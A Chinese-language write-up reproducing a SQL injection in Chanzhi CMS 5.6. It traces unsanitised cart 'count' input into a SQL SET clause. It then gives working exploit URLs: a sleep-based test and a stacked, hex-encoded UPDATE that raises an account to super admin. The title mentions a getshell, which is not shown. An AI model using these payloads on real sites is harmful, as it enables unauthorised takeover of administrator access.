首页 > 代码库 > [复现]蝉知cms 5.6 前台注入+getshell

[复现]蝉知cms 5.6 前台注入+getshell

2024-11-25 04:59:02   204人阅读

https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5

前台注入

在/chanzhieps/system/module/cart/control.php页面的add函数

public function add($product, $count)
    {
        if($this->app->user->account == ‘guest‘)
        {
            /* Save info to cookie if user is guest. */
            $this->cart->addInCookie($product, $count);
            $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess)); 
        }
        else
        {
            $result = $this->cart->add($product, $count);
            if($result) $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess));
            $this->send(array(‘result‘ => ‘fail‘, ‘message‘ => dao::getError()));
        }
}

public function add($product, $count) $count是用户输入
我们看会员登录以后的,也就是

$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php

public function add($productID, $count)
    {
        $hasProduct = $this->dao->select(‘count(id) as count‘)->from(TABLE_CART)->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->fetch(‘count‘);

        if(!$hasProduct)
        {
            $product = new stdclass();
            $product->product = $productID;
            $product->account = $this->app->user->account;
            $product->count   = $count;
            $this->dao->insert(TABLE_CART)->data($product)->exec();
        }
        else
        {
            $this->dao->update(TABLE_CART)->set("count= count + {$count}")->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->exec();
        }

        return !dao::isError();
}

如果能查到产品的话,更新数量set("count= count + {$count}")
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php

public function set($set)
    {
        /* Add ` to avoid keywords of mysql. */
        if(strpos($set, ‘=‘) ===false)
        {
            $set = str_replace(‘,‘, ‘‘, $set);
            $set = ‘`‘ . str_replace(‘`‘, ‘‘, $set) . ‘`‘;
        }

        $this->sql .= $this->isFirstSet ? " $set" : ", $set";
        if($this->isFirstSet) $this->isFirstSet = false;
        return $this;
}

可以看到直接进入了$this->sql
测试一下

http://localhost/www/index.php/cart-add-1-(select%20sleep(10))

成功进行延时操作

这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行

http://localhost/www/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@b;execute%20x;select%201%20union%20select%201

update一下 将低权限账户提升至super

进入后台

[复现]蝉知cms 5.6 前台注入+getshell


联系
我们